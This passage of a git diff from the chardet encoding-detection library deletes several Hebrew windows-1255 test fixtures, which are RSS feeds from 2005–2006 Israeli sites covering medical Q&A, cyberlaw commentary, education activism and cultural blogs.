    - טראזודיל (טראזודון) תרופה נוגדת דיכאון
    - פלואורואוראציל תרופה נוגדת סרטן
    -
    - אינדקס התרופות -
    - - he-IL - מיץ חמוציות כטיפול בדלקות בדרכי השתן - http://www.infomed.co.il/questions/q_010206_1.htm - 2006-01-02T10:43:39 -
    דלקות בדרכי השתן מסוכנות לנשים בגיל ההריון. הם עלולות לגרום להפלות וללידה מוקדמת. מיץ חמוציות יכול לעזור במניעה
    - שאלות ותשובות -
    - - he-IL - עד איזה שבוע בהריון רגיל ניתן לטוס לחו"ל ללא חשש? - http://www.infomed.co.il/questions/q_010206_2.htm - 2006-01-02T10:43:39 -
    התשובה מפנה לתשובה מפורטת באינפומד, ולריכוז התשובות בנושא
    - שאלות ותשובות -
    - - he-IL - כניסה להריון בגיל 60 . - http://www.infomed.co.il/questions/q_010206_3.htm - 2006-01-02T10:43:39 -
    הסיכוי שואף לאפס
    - שאלות ותשובות -
    - - he-IL - על ניתוח להחלפת ברך - http://www.infomed.co.il/questions/q_010206_4.htm - 2006-01-02T10:43:39 -
    תשובה על הניתוח להחלפת הברך, סיכונים ויתרונות
    - שאלות ותשובות -
    - - he-IL - מה המשמעות של בלוטת אינטרה ממארית תקינה בבדיקת הדמיה - http://www.infomed.co.il/questions/q_010106_1.htm - 2006-01-01T14:05:00 -
    מדובר בקשרית לימפה בבית החזה, ובמקרה דנן התוצאות תקינות
    - שאלות ותשובות -
    - - he-IL - בלט דיסק בבדיקת CT של עמוד השדרה - http://www.infomed.co.il/questions/q_010106_2.htm - 2006-01-01T14:05:00 -
    נראה לפי תוצאות הבדיקה כי קיים לחץ קל על עצבי חוט השדרה
    - שאלות ותשובות -
    - - he-IL - האם ריח רע יכול לנבוע מהתקן תוך רחמי - http://www.infomed.co.il/questions/q_010106_3.htm - 2006-01-01T14:05:00 -
    בדרך כלל לא, התשובה מפנה לתשובה מפורטת באינפומד על ההתקן התוך רחמי
    - שאלות ותשובות -
    - - he-IL - על המחלה אמלוגנסיס אימפרפקטה - http://www.infomed.co.il/questions/q_010106_4.htm - 2006-01-01T14:05:00 -
    זו מחלה תורשתית הגורמת לשחיקת האמייל בשן. ממולצות דרכי הטיפול המקובלות
    - שאלות ותשובות -
    - - he-IL - איחור במחזור של חודש ותוצאות בדיקות הריון שליליות - http://www.infomed.co.il/questions/q_010106_5.htm - 2006-01-01T14:05:00 -
    השואלת גם סבלה מתת פעילות של בלוטת התריס. התשובה מציעה את הבדיקות שכדאי לעשות במקרה הנדון
    - שאלות ותשובות -
    - - he-IL - עליה במקרי הרעלה מפאראצטאמול - http://www.infomed.co.il/news/n_123105_1.htm - 2005-12-31T13:06:50 -
    על פי מנהל התרופות האמריקאי כ- 56 אלף מקרים של הרעלת פאראצטאמול קורים מדי שנה. פירוט בחדשה
    - חדשות רפואיות -
    - - he-IL - מיפוי עצמות לאחר כאבי ברכיים - http://www.infomed.co.il/questions/q_123005_1.htm - 2005-12-30T17:29:42 -
    על תוצאת מיפוי עצמות לאחר תלונות על כאבי ברכיים, והמלצות להמשך טיפול
    - שאלות ותשובות -
    - - he-IL - על "קנאקים" בברכיים - http://www.infomed.co.il/questions/q_123005_2.htm - 2005-12-30T17:29:42 -
    מה הסיבה לרעשים האלו שיש לפעמים בברכיים
    - שאלות ותשובות -
    - - he-IL - טיפול בדלקת בגידים שבאיזור המפשעה - http://www.infomed.co.il/questions/q_123005_3.htm - 2005-12-30T17:29:42 -
    זריקות סטרואידים יכולות לעזור, בנוסף לעיסוי ועוד. השאר בתשובה
    - שאלות ותשובות -
    - - he-IL - על ניתוח ארתרוסקופיה - http://www.infomed.co.il/questions/q_123005_4.htm - 2005-12-30T17:29:42 -
    על ניתוח ארתרוסקופיה ויתרונותיו
    - שאלות ותשובות -
    -
    -
    - - - diff --git a/chardet/tests/windows-1255-hebrew/law.co.il.xml b/chardet/tests/windows-1255-hebrew/law.co.il.xml deleted file mode 100644 index 3604a30..0000000 --- a/chardet/tests/windows-1255-hebrew/law.co.il.xml +++ /dev/null @@ -1,100 +0,0 @@ - - - - - - - - - law.co.il CyberLaw Articles (Hebrew) - http://www.law.co.il -Articles & News from Ravia & Co., Law Offices, website. -he-il - -Haim Ravia - - -124 -38 -http://www.law.co.il/images/law.co.il_rss.gif -http://www.law.co.il/ - - - - בדיחה רעה - http://law.co.il/showarticles.php?d=h&article=258 - -תזכיר חוק מסחר אלקטרוני, התשס&quot;ו-2005 מבקש להסדיר בחקיקה שתי סוגיות טעונות: חשיפת זהותם של מחברים אנונימיים והסרת תכנים פוגעניים. אלא שהוראות התזכיר בעניינים אלה לוקות בחסר ואינן מיישמות אחר לקחים שנלמדו בחיי המעשה מהוראות מקבילות בדינים האירופאיים והאמריקאיים. - - - - - על חוק מסחר אלקטרוני - http://law.co.il/showarticles.php?d=h&article=257 - -בימים אלה פרסם משרד המשפטים להערות הציבור תזכיר חוק, המבקש להסדיר היבטים שונים של סחר אלקטרוני ושימוש ברשתות מחשב מקוונות. תזכיר החוק מבוסס על דו&quot;ח ועדת הסחר האלקטרוני שפעלה במשרד. לא את כל ליקויי הדו&quot;ח תיקן -התזכיר... - - - - - אנונימיות מוגנת - http://law.co.il/showarticles.php?d=h&article=256 - -העדרו של הליך לחשיפת פרטיהם של אלמונים המשתמשים באינטרנט לרעה - לדוגמה, כדי להשמיץ, לחדור למחשב או להפר זכויות יוצרים - הוא חסרון מהותי בדיני מידע בישראל. כיצד לאזן בין זכותם של תובעים תמימים לשם טוב או להגנה על קניינם לבין זכותם של דוברים אנונימיים להתבטא בחופשיות כל עוד אינם מפרים חוק? הפסיקה האמריקאית מגבשת קווים מנחים ב- John Doe v. Cahill. - - - - - לזבל או לא לזבל? - http://law.co.il/showarticles.php?d=h&article=255 - -פסיקה חדשה של בית המשפט המחוזי בתל-אביב (בר&quot;ע 2542/03 סוויסה נ' בן חיים) עוסקת באיסוף כתובות דואר אלקטרוני לצרכי דיוור. האמנם פסק הדין הוא 'עקרוני' ו'ראשון מסוגו' כפי שהכתירו אותו העתונים? המאמר מציע קריאה מונחית בפסק-הדין וגישה זהירה כלפי מה שמצטייר כהכרעה מטרידה. - - - - - טכנולוגיות מידע והגנת הפרטיות - http://law.co.il/showarticles.php?d=h&article=254 - -משרד המשפטים מקים בימים אלה רשות משפטית לטכנולוגיות מידע ולהגנת הפרטיות. הרשות תחל לפעול ב- 2006 ובין השאר תאגד את רשמי מאגרי המידע והגורמים המאשרים. בין הסיבות להקמתה - החשש שהימנעות מאכיפת דינים וסיוע בחקירות מחשב בינלאומיות תמיט על ישראל סנקציות כדוגמת אלה שהוטלו קודם להקמת הרשות לאיסור הלבנת הון. מה מיועדת הרשות לעשות ובאיזה אופן תוכל להשפיע על תחומי עיסוקה? - - - - שיתוף הקבצים חי ובועט - http://law.co.il/showarticles.php?d=h&article=253 - בימים אלה ניתן פסק דין בבית משפט באוסטרליה כנגד בעליה של תוכנת שיתוף הקבצים קאזה. פסק הדין מחסל, הלכה למעשה, את עסקיה של קאזה עם השוק האוסטרלי ומצטרף לפסק דין דומה שניתן בארצות הברית כנגד תוכנות נוספות. רבים רואים בהחלטה זו מכה נוספת שניחתה על תוכנות שיתוף הקבצים וכהישג במאבק בהפרת זכויות יוצרים באינטרנט. מאמר זה מבקש לצנן את ההתלהבות האוחזת במצדדים במאבק של תעשיות התקליטים, הסרטים והתוכנה. ההישג קטן מדי, בא באיחור ומהר מאד יהפוך לבלתי רלבנטי. - - - - המחיר החברתי של אחריות ספקים - http://law.co.il/showarticles.php?d=h&article=248 - פסק-דין חדש של בית משפט השלום בתל-אביב מחזק את המגמה של הסרת האחריות מספקי שירותים באינטרנט על תוכן משמיץ שפירסמו המשתמשים באתרי האינטרנט שלהם. הוא אף קובע שאין לאפשר לאדם ליצור לעצמו &quot;חסינות&quot; מפני כל פרסום שהוא לכאורה פוגע, על ידי משלוח מכתב אזהרה לאתר, תוך חיוב האתר מאותו שלב ואילך להיות אחראי למנוע כל פרסום המתייחס לאותו אדם שיש בו משום לשון הרע. לצד זה, יש בו הרהור מדאיג בשאלה האם אתר אינטרנט = עיתון. - - - - סוף עידן החלפת הקבצים? - http://law.co.il/showarticles.php?d=h&article=247 - בית המשפט העליון של ארצות-הברית פסק: חברות המפתחות תוכנות לשיתוף קבצים מסייעות בהפרת זכות יוצרים אם הן מפיצות את התוכנה בכוונה לקדם הפרות. בכך סייג בית המשפט את הלכת סוני (1984). האם החלפת הקבצים תעלם מן העולם? - - - - פיל לבן - http://law.co.il/showarticles.php?d=h&article=245 - חלפו עשר שנים מאז נחקק חוק המחשבים. זמן לחשבון נפש - האם זהו החוק הנכון? (לא), האם הבעיה נמצאת רק בו? (לא) ומה כדאי לעשות הלאה. - - - - - אפשר אחרת - http://law.co.il/showarticles.php?d=h&article=244 - חשיפה ראשונה - מערכת לניהול בוררויות מקוונות בין חברות הביטוח טיפלה בשנה החולפת בתביעות בסכום של כ- 200 מליון ש&quot;ח. מהשקתה לפני כשנתיים נוהלו בה 16,000 תיקים. המערכת מאפשרת למנוייה - כל חברות הביטוח בישראל למעט אחת - ממשק דפדפן לניהול תיקים וקבלת מידע. היא מציעה ערכאת ערעור פנימית ומפרסמת פסקי בורר בעלי עניין לכל מנויה.&quot;אפשר אחרת&quot; מסכם יוזם המערכת, עו&quot;ד יהודה טוניק. - - - - - \ No newline at end of file diff --git a/chardet/tests/windows-1255-hebrew/maakav.org.xml b/chardet/tests/windows-1255-hebrew/maakav.org.xml deleted file mode 100644 index 5d09257..0000000 --- a/chardet/tests/windows-1255-hebrew/maakav.org.xml +++ /dev/null @@ -1,68 +0,0 @@ - - - - - - - -מעקב חינוך -http://www.maakav.org -מעקב חינוך -he-il - - -משמרת מחאה נגד תוכניתו של אולמרט ובעד השכלה גבוהה -http://www.maakav.org/edunuke/html/article.php?sid=457 - - - -אולמרט נלחם בהשכלה הגבוהה בשם "המלחמה בעוני" / ישראל בלכמן -http://www.maakav.org/edunuke/html/article.php?sid=456 - - - -תעודת סיום לשרת החינוך -http://www.maakav.org/edunuke/html/article.php?sid=455 - - - -פורסם דו"ח "תמונת מצב חברתית 2005" של מרכז אדוה / ישראל בלכמן -http://www.maakav.org/edunuke/html/article.php?sid=454 - - - -עמותת ''אלון'' ועמותת ''מהפך'' מזמינות -http://www.maakav.org/edunuke/html/article.php?sid=453 - - - -קורס ''נאמני החינוך'' של תנועת משמר החינוך -http://www.maakav.org/edunuke/html/article.php?sid=452 - - - -חזרה מהפגרה -http://www.maakav.org/edunuke/html/article.php?sid=451 - - - -למרות החופשה - המלצה על ספר חדש -http://www.maakav.org/edunuke/html/article.php?sid=450 - - - -ברכת שנה טובה ויציאה לחופשה -http://www.maakav.org/edunuke/html/article.php?sid=449 - - - -תגובה למאמרו של אור קשתי על ועדות ההשמה -http://www.maakav.org/edunuke/html/article.php?sid=448 - - - - \ No newline at end of file diff --git a/chardet/tests/windows-1255-hebrew/neviim.net.xml b/chardet/tests/windows-1255-hebrew/neviim.net.xml deleted file mode 100644 index 37038bc..0000000 --- a/chardet/tests/windows-1255-hebrew/neviim.net.xml +++ /dev/null @@ -1,126 +0,0 @@ - - - - - - - נביאים אחרונים « ביקורת תרבות וחברה - http://www.neviim.net - נבואות זעם ידידותיות למשתמש - Copyright 2005 - Wed, 04 Jan 2006 15:07:52 +0000 - http://wordpress.org/?v=1.2.1 - - - פרשת השבוע - http://www.neviim.net/index.php?p=87 - http://www.neviim.net/index.php?p=87#comments - Thu, 29 Dec 2005 20:01:28 +0000 - - פרלמנט http://www.neviim.net/index.php?p=87 - פרשת השבוע חוזרת. על הקשר בין פוליטיקה ואתלטיקה קלה: על פוליטיקה, מסתבר, אפשר להגיד הכל מלבד "זה רק ספורט" ופיתרון אפשרי לבעיית הפרסום והידוענות של קטינים. -&nbsp;&nbsp; - http://www.neviim.net/wp-commentsrss2.php?p=87 - - - התנ"ך ונפלאות העברית - http://www.neviim.net/index.php?p=86 - http://www.neviim.net/index.php?p=86#comments - Fri, 23 Dec 2005 15:55:50 +0000 - - פרלמנט http://www.neviim.net/index.php?p=86 - אם תיתן ליווני או לאנגלי טקסטים שנכתבו בימי אגממנון או המלך ארתור – הם לא יבינו מילה מהכתוב. לעומת זאת, דוברי העברית עדיין מסוגלים להבין חלק גדול מכתביהם העתיקים. וכך קרה שאנחנו חיים בתקופה מעניינת מאוד, שבה השפה המדוברת והשפה הכתובה עדיין חיות בשלום יחסי, ולא אחת אפשר לגלות שסלנג ... - http://www.neviim.net/wp-commentsrss2.php?p=86 - - - מחול בארץ עוץ - http://www.neviim.net/index.php?p=84 - http://www.neviim.net/index.php?p=84#comments - Mon, 19 Dec 2005 13:09:06 +0000 - - שפופרת http://www.neviim.net/index.php?p=84 - ביקורת טלוויזיה על שלוש תוכניות. האחת בשדרחב (broadcasting) ושתיים בשדרצר בלוויין. על סופות חול, קסם ומחול. הקוסם מארץ עוץ נולד לרקוד אי שם. -&nbsp;&nbsp; - http://www.neviim.net/wp-commentsrss2.php?p=84 - - - פרו ורבו: על התרבות החרדים - http://www.neviim.net/index.php?p=82 - http://www.neviim.net/index.php?p=82#comments - Tue, 06 Dec 2005 19:06:22 +0000 - - פרלמנט http://www.neviim.net/index.php?p=82 - בעקבות הקרנת סרטה של שוש שלם, "פרו ורבו", מאמר שבא לשפוך אור חדש ודיעה אחרת על ריבוי הילודה בקרב המגזר החרדי. בחינה תרבותית רחבה ומעמיקה של הנושא, החל מילדיהם הבלתי נולדים של ניצולי השואה והמלחמה במורשתו של הצורר ועד להתבוללות בתפוצות, לניצחון בחדרי המיטות ולבעייה הדמוגרפית בישראל דהיום; על נצחיותו ... - http://www.neviim.net/wp-commentsrss2.php?p=82 - - - לשחרר את ביל - http://www.neviim.net/index.php?p=81 - http://www.neviim.net/index.php?p=81#comments - Thu, 24 Nov 2005 15:14:36 +0000 - - פנס קסם http://www.neviim.net/index.php?p=81 - מסעיצות היא תרבות שלמה השואבת את כל הווייתה מסדרת "מסע בין כוכבים", ששודרה מעל ל-30 שנה בטלוויזיה האמריקאית וברחבי העולם. לתרבות הזו מאפיינים מאוד מיוחדים ובין השאר נוצרו במסגרתה סרטי מעריצים לסדרה. על תופעת המסעיצות ורשמים מהקרנת הבכורה בהנחיית במאי סרט המעריצים Free Enterprise. כתבה שנייה במסגרת הסיקור ... - http://www.neviim.net/wp-commentsrss2.php?p=81 - - - הפרסום לילדים כמתקפה על חסרי ישע - http://www.neviim.net/index.php?p=80 - http://www.neviim.net/index.php?p=80#comments - Tue, 22 Nov 2005 18:06:54 +0000 - - פרלמנט http://www.neviim.net/index.php?p=80 - כשירות לגולשים אנו מפרסמים מחדש את המאמר "הפרסום לילדים כמתקפה על חסרי ישע" שכותבו, חבר מערכת "נביאים אחרונים" , התארח בתוכנית "מוסף המוספים" בטלוויזיה החינוכית. -&nbsp;&nbsp;&nbsp; - http://www.neviim.net/wp-commentsrss2.php?p=80 - - - ציוני בגרות - http://www.neviim.net/index.php?p=79 - http://www.neviim.net/index.php?p=79#comments - Mon, 21 Nov 2005 18:30:59 +0000 - - אריך נגן http://www.neviim.net/index.php?p=79 - הליך ההזדקנות של להקות הוא לעיתים קרובות תהליך הרסני. על שלוש להקות מתבגרות – זאת שמקריבה את היצירתיות על מזבח ה"בגרות", זאת שמתקשה לשחזר את ימי השיא שלה וזאת שגורמת לרצות להתבגר עמה. -&nbsp;&nbsp; - http://www.neviim.net/wp-commentsrss2.php?p=79 - - - ידענו חטא - http://www.neviim.net/index.php?p=78 - http://www.neviim.net/index.php?p=78#comments - Tue, 15 Nov 2005 09:19:47 +0000 - - פרלמנט http://www.neviim.net/index.php?p=78 - המסורת המדעית לקחה כמובן מאליו שתרומות המדע לחברה תמיד חיוביות. בשלהי המאה ה-19 דומה היה שלא רחוק היום שהאדם יוכל, הודות למדע, לדעת את כל הדברים ולבסס את מעמדו כאדון היקום האלהי. עידן חדש של תעשייה נבנה על התגלית המדעית – מנוע הבעירה הפנימית, הרכבות, החשמל. אולם פצצות האטום שהוטלו ... - http://www.neviim.net/wp-commentsrss2.php?p=78 - - - איינשטיין והפצצה הגרעינית - http://www.neviim.net/index.php?p=77 - http://www.neviim.net/index.php?p=77#comments - Tue, 08 Nov 2005 21:25:30 +0000 - - פרלמנט http://www.neviim.net/index.php?p=77 - העולם מציין השנה 60 שנה לאחד הרגעים הנוראים בהיסטוריה. הרגע שבו נגזר מוות מיידי על 80 אלף איש ושנים של גוויעה בייסורים על רבבות נוספים. 60 שנה אחרי הפצצה הגרעינית שהטילה ארה"ב על הירושימה ונַגַסאקי, מסקרנת תרומתו של גאון המוחות המדעיים, אלברט איינשטיין, יחד עם שורה של מדענים יהודים, בפיתוח ... - http://www.neviim.net/wp-commentsrss2.php?p=77 - - - גחליליות רודפות אחריך - http://www.neviim.net/index.php?p=74 - http://www.neviim.net/index.php?p=74#comments - Mon, 24 Oct 2005 17:53:21 +0000 - - פנס קסם http://www.neviim.net/index.php?p=74 - לאחר שסולקו באכזריות מעל המסך הקטן, שבים קפטן מאל ריינולדס וצוותו אל המסך הגדול. בהקרנת הטרום בכורה המיוחדת במסגרת אייקון 2005 היה מאוד לא רגוע. ביקורת נטולת הרסנים. -&nbsp;&nbsp; - http://www.neviim.net/wp-commentsrss2.php?p=74 - - - diff --git a/chardet/tests/windows-1255-hebrew/notes.co.il.50.xml b/chardet/tests/windows-1255-hebrew/notes.co.il.50.xml deleted file mode 100644 index 6ba2655..0000000 --- a/chardet/tests/windows-1255-hebrew/notes.co.il.50.xml +++ /dev/null @@ -1,35 +0,0 @@ - - -he:היקום של אלי אשד http://www.notes.co.il/eshedלכאן קל להיכנס אבל קשה מאוד לצאת . אלי אשדאלי אשדמפלצות בערוץ 2 http://www.notes.co.il/eshed/15628.asp<div dir="rtl" style="width:100%"><DIV class=imgDiv><IMG class=imgbox src="http://www.notes.co.il/eshed/user/רב%20שאנן.jpg"></DIV> -<P>&nbsp;</P> -<P>מחר&nbsp; יום שלישי ה-3.1 יתנהל בתוכנית הבוקר של ערוץ 2 "רשת על הבוקר " בין 8 ל-9 &nbsp;&nbsp;דיון בנושא המרתק תמיד של &nbsp;"מפלצות&nbsp;&nbsp; בסרטים ומשמעויותיהן&nbsp;&nbsp;". &nbsp;בהשתתפותי .</P> -<P>הקוראים מוזמנים לצפות..</P></div>2006-01-02T22:55:00+02:00האם "הארי פוטר " נכתב בידי צוות שלם של סופרים? http://www.notes.co.il/eshed/15615.asp<div dir="rtl" style="width:100%"><P>&nbsp;</P> -<DIV class=imgDiv><IMG class=imgbox src="http://www.notes.co.il/eshed/user/רולינג.jpg"></DIV> -<P>האם ג.ר רולינג מחברת "הארי פוטר" היא רק נציגה של צוות שלם של סופרים אנונימיים ?</P> -<P>זה מה שטוענת הבמאית הנורווגית <A href="http://www.aftenposten.no/english/local/article1169209.ece" target=_blank>נינה גרונפלד </A>במאמר בעיתון נורוו...</div>2006-01-02T11:39:00+02:00הפאנטום בכנס קאבום 2 http://www.notes.co.il/eshed/15584.asp<div dir="rtl" style="width:100%"><DIV class=imgDiv><IMG class=imgbox src="http://www.notes.co.il/eshed/user/בוקי=פנטום%2022.jpg"></DIV> -<P>&nbsp;</P> -<P>ביום ראשון ה-1 ביאנואר 2006 יתקיים ב בבי"ס התיכון ע"ש 'אחד העם' בפתח תקווה - רחוב גיסין 60, כנס "<A href="http://kaboom.okay.org.il/home.asp" target=_blank>קאבום 2"</A> כנס הקומיקס השנתי של אירגון "אוק"י " אירגון חובבי ואספני ה...</div>2005-12-31T06:03:00+02:00"שוב דולק הנר " שיר מאת דפנה שחורי http://www.notes.co.il/eshed/15583.asp<div dir="rtl" style="width:100%"><P>&nbsp;</P> -<DIV class=imgDiv style="WIDTH: 232px"><IMG class=imgbox src="http://www.notes.co.il/eshed/user/דפנה%20שחורי%20צילום%201.jpg"><BR> -<P class=infopoped>דפנה שחורי </P></DIV> -<P><BR>דפנה שחורי היא&nbsp; מבקרת ספרותית ומשוררת צעירה ואחת הבולטות ביותר כיום בשירה הישראלית. <BR>עד היום פירסמה שלושה ספרי שירה והראשון בהם יחד עם אחותה שבי ...</div>2005-12-31T05:55:00+02:00הכישוף מארץ עוץ : 40 שנה ל"עוץ לי גוץ לי " מאת שלונסקי http://www.notes.co.il/eshed/15576.asp<div dir="rtl" style="width:100%">קהל נכבד ברגע זה מתחיל סיפור המחזה .מעשה במשורר גדול שהאמין בכוחם של ילדים להבין מילים של זהב ולא רק של קש. הבמאי נבהל ,השחקנים חישבו את סוף הקריירה ,אבל שלונסקי עמד על שלו.כך באה לעולם לפני 40 שנה בדיוק "עוץ לי גוץ לי " הצגת הילדים המופתית שרצה עד היום. -בדצמבר 65' עלה אריק לביא על במת הקאמרי ופצח בזמר מול אולם מלא בילדים. "קהל נכבד, ברגע זה/ מת...</div>2005-12-31T03:56:00+02:00נגד התאגידים בעד לגליזציה של סמים : דן גולדנבלט לכנסת http://www.notes.co.il/eshed/15570.asp<div dir="rtl" style="width:100%">דן גולדנבלאט הוא מועמד לכנסת מטען מפלגת הבחירה הדמוקרטית של רומן ברונפמאן שמחזיק בדעות שנויות ביותר במחלקות כמו הצורך בלגליזציה של סמים והוסרבנות שירות בשטחים. </div>2005-12-30T05:30:00+02:00אסף ענברי קובר את פרופסור דן מירון http://www.notes.co.il/eshed/15438.asp<div dir="rtl" style="width:100%"><P>מבקר הספרות אסף ענברי פירסם בגיליון האחרון של כתב העת "קשת החדשה " מספר 14 את אחד ממאמרי הביקורת הספרותית והתרבותית המרשימים ביותר שקראתי בשנים האחרונות "דיוקנו הרוחני העדכני של דן מירון ". במסה זאת יוצא ענברי לנתח את ספרו החדש של אחד המבקרים והחוקרים הספרותיים הנחשבים ביותר כאן פרופסור דן מירון "הרפיה לצורך נגיעה " ומראה כיצד הספר הזה שבו מעלה...</div>2005-12-24T12:02:00+02:00 סיפורי קומיקס לחג החנוכה http://www.notes.co.il/eshed/15433.asp<div dir="rtl" style="width:100%">ולרגל חג החנוכה המתקרב :סקירה על סיפורי הקומיקס ,המועטים ,יש לציין העוסקים בחג .</div>2005-12-24T09:33:00+02:00סופרי המדע הבדיוני נגד סופרי הפנטזיה http://www.notes.co.il/eshed/15404.asp<div dir="rtl" style="width:100%"><P>&nbsp;המדען וסופר המדע הבדיוני המפורסם גרגורי בנפורד פירסם לאחרונה באתרו את <A href="http://benford-rose.com/blog/?p=3" target=_blank>הפוסט המעניין הזה</A><A href="http://www.benford-rose.com/graphics/br-header.jpg" target=_blank> </A>שבו הוא תוקף בארסיות את ז'אנר ספרות הפנטזיה את חובביו ואת כל מה שהוא מייצג. </P> -<P>הסיבה לארסיות ? ז'אנר הפנט...</div>2005-12-22T22:14:00+02:00צמד חמד חלק ב: מקס ומוריץ חיים וקיימים ומרגישים טוב בארה"ב http://www.notes.co.il/eshed/15295.asp<div dir="rtl" style="width:100%">בימים אלו מלאו 107 שנים בדיוק לראשית פירסומה של סדרת הקומיקס מאריכת הימים ביותר בהיסטוריה -"ילדי קזמאנייר " סדרה שהחלה את חייה כחיקוי של "מקס ומוריץ מאת בוש ,וממשיכה בכך מזה 107 שנים בלי שום סימן שהיא מתכוונת להסתיים מתי שהוא . </div>2005-12-16T20:16:00+02:00צמד חמד חלק א: 140 שנה למקס ומוריץ http://www.notes.co.il/eshed/15294.asp<div dir="rtl" style="width:100%">החודש מלאו 140 שנה לסיפור הקומיקס וותיק ועדיין הפופולארי ביותר בהיסטוריה ,"מאקס ומוריץ "מאת וילהלם בוש. עלילות שני ילדים תעלולנים שמוצאים את סופם בדרך מזווויעה במיוחד .</div>2005-12-16T20:13:00+02:00רצה לטווח הארוך : עינת וילף לכנסת http://www.notes.co.il/eshed/15267.asp<div dir="rtl" style="width:100%">לרגל הבחירות המתקרבות הנה ראיון עם אחת המועמדות הצעירות והבולטות ביותר למפלגת העבודה . -,עינת וילף. -</div>2005-12-15T10:01:00+02:00תיאורית הקשר על רוג'ר זילאזני http://www.notes.co.il/eshed/15211.asp<div dir="rtl" style="width:100%"><DIV class=imgDiv><IMG class=imgbox src="http://www.notes.co.il/eshed/user/אדון%20האור.gif"></DIV> -<P>היום&nbsp; ה-14.12 -אני מרואיין במסגרת תוכנית "גלי צה""ל "<A href="http://www.glz.msn.co.il/glz/programs/hakesher/C6DA1FD4CADF494A9862BBB72570EC69.htm" target=_blank>תיאוריית הקשר </A>" בידי המנחה האינטילגנטי והרהוט <A href="http://he.wikipedia.o...</div>2005-12-14T05:26:00+02:00סופר המדע הבדיוני רוברט שקלי נפטרhttp://www.notes.co.il/eshed/15199.asp<div dir="rtl" style="width:100%"><DIV class=imgDiv><IMG class=imgbox src="http://www.notes.co.il/eshed/user/אלי%20אשד%20ושקלי%202.jpg"></DIV> -<P>&nbsp;</P> -<P>&nbsp;</P> -<P>לאחרונה <A href="http://www.isf.co.il/news.asp?ref=5276" target=_blank>נפטר </A>אחד מסופרי המדע הבדיוני המפורסמים ביותר בעולם רוברט שקלי כתוצאה מקריש דם במוחו . הוא היה בן 77 במותו. <BR>הוא היה אחד מסופרי ה...</div>2005-12-13T17:11:00+02:00שובה של יסמין אבן http://www.notes.co.il/eshed/15171.asp<div dir="rtl" style="width:100%"><P>&nbsp;</P> -<DIV class=imgDiv><IMG class=imgbox src="http://www.notes.co.il/eshed/user/יסמין%20אבן%20תמונה.jpg"></DIV> -<P>ביום ג', 20.12.05, בשעה 22:30 תתקיים הופעה של <A href="http://www.notes.co.il/eshed/4929.asp" target=_blank>יסמין אבן </A><BR>במועדון "לימה לימה" ,לילינבלום 42, תל אביב <BR><BR>בהופעה יתארחו <A href="http://www.mooma.com/Bi...</div>2005-12-12T16:00:00+02:00"השמיניה " כמובילי תרבות http://www.notes.co.il/eshed/15062.asp<div dir="rtl" style="width:100%"><DIV class=imgDiv><IMG class=imgbox src="http://www.notes.co.il/eshed/user/השמיניה%20ותעלומת%20המסכיה%20הברומזית.jpg"></DIV> -<P>&nbsp;</P> -<P>כוכבי הסדרת הטלוויזיה לילדים "<A href="http://www.notes.co.il/eshed/13365.asp" target=_blank>השמיניה"</A> הופכים לדבר הלוהט ביותר לא רק בטלוויזיה אלא גם בתקשורת. כמעט מידי יום ביומו אחד מנציגיהם ואנשי צוות...</div>2005-12-09T08:06:00+02:00 אורי פינק באוניברסיטת באר שבע http://www.notes.co.il/eshed/14958.asp<div dir="rtl" style="width:100%"><P>&nbsp;</P> -<DIV class=imgDiv style="WIDTH: 490px"><IMG class=imgbox src="http://www.notes.co.il/eshed/user/אורי%20פינק%20ואבי%20כץ.jpg"><BR> -<P class=infopoped>אורי פינק עם האמן אבי כץ </P></DIV> -<P>&nbsp;</P> -<P>שותפי ועמיתי אמן הקומיקס הידוע <A href="http://www.haaretz.co.il/hasite/pages/ShArtPE.jhtml;$sessionid$YO2MXHQAABC1DLAUAUDCGWVMCQ...</div>2005-12-04T15:30:00+02:00יוסי סאוני על טקס וילר http://www.notes.co.il/eshed/14931.asp<div dir="rtl" style="width:100%">חובב מושבע של סיפרת המערבונים "טקס " חיבר מאמר הקדמה מקיף על סדרה זאת שאותו אנו מביאים כאן בשלמותו . </div>2005-12-03T07:55:00+02:00טקס וילר לראשות הממשלה! http://www.notes.co.il/eshed/14930.asp<div dir="rtl" style="width:100%"><DIV class=imgDiv><IMG class=imgbox src="http://www.notes.co.il/eshed/user/טקס%20וזאגור%20מול%20קהל.jpg"></DIV> -<P>בימים אלה כשמערכת הבחירות לראשות הממשלה מתנהלת במלוא עוזה מתחממת והמועמדים לא נראים כלל כמשהו הראוי לבחירת אדם אולי כדאי לפנות למועמד אחר היכול לחלץ את המדינה ותושביה ממצוקתם הקשה . המדובר בגיבור המערב הפרוע <A href="http://www.notes...</div>2005-12-03T08:00:00+02:00 diff --git a/chardet/tests/windows-1255-hebrew/notes.co.il.6.xml b/chardet/tests/windows-1255-hebrew/notes.co.il.6.xml deleted file mode 100644 index 255108d..0000000 --- a/chardet/tests/windows-1255-hebrew/notes.co.il.6.xml +++ /dev/null @@ -1,10 +0,0 @@ - - -heיואב קרני בוושינגטוןhttp://www.notes.co.il/karnyיואב קרנייואב קרנימלחמת המעמדותhttp://www.notes.co.il/karny/15457.asp<div dir="rtl" style="width:100%">מֵהרי האַנדים עד שדרות מנהטן נשמעה בשבוע שעבר הבשורה: אם תשאירו אותנו מאחור, אנחנו נאבד את החשק להגן על הסטאטוס-קוו. השמות שכדאי ללמוד: אֶבוֹ מוֹראלֶס ורוג'ר טוּסאן. הם, אולי, אנשי המאה ה-21 </div>2005-12-31T08:38:00+02:00מלחמת חג המולדhttp://www.notes.co.il/karny/15455.asp<div dir="rtl" style="width:100%">מנהיג יהודי בולט באמריקה מזהיר מפני נסיון מסיבי של הימין הנוצרי "לנַצר את כל הבטי החיים באמריקה". מנהיגים נוצריים ושדרים ימניים מתלוננים ש"מלחמה סודית" מתנהלת נגד חג המולד, ובעצם נגד הנצרות עצמה. דֵי קל להיות יהודי באמריקה, אבל קצת פחות קל בימי דצמבר הקרים</div>2005-12-31T05:41:00+02:00נפילתו ועלייתו של סיניור בניטו ניתאי. אגדה ישראלית http://www.notes.co.il/karny/15430.asp<div dir="rtl" style="width:100%">"עלינו להציל את איטליה", אמר ברלוסקוני. "סע לירושלים, ואל תחזור בלעדיו. אם הוא לא יסכים, דבר עם עומרי שרון, שֶיְסַדֵר איזה משבר ממשלתי". והאיטלקית הרהוטה שלו? דאנטה לא היה מאמין, אבל ז'בוטינסקי דווקא כן</div>2005-12-24T02:09:00+02:00העיקר הבריאות, או לא כל כךhttp://www.notes.co.il/karny/15415.asp<div dir="rtl" style="width:100%">צ'רצ'יל הנהיג את מפלגתו לנצחון בגיל 76, עם מעט מאוד 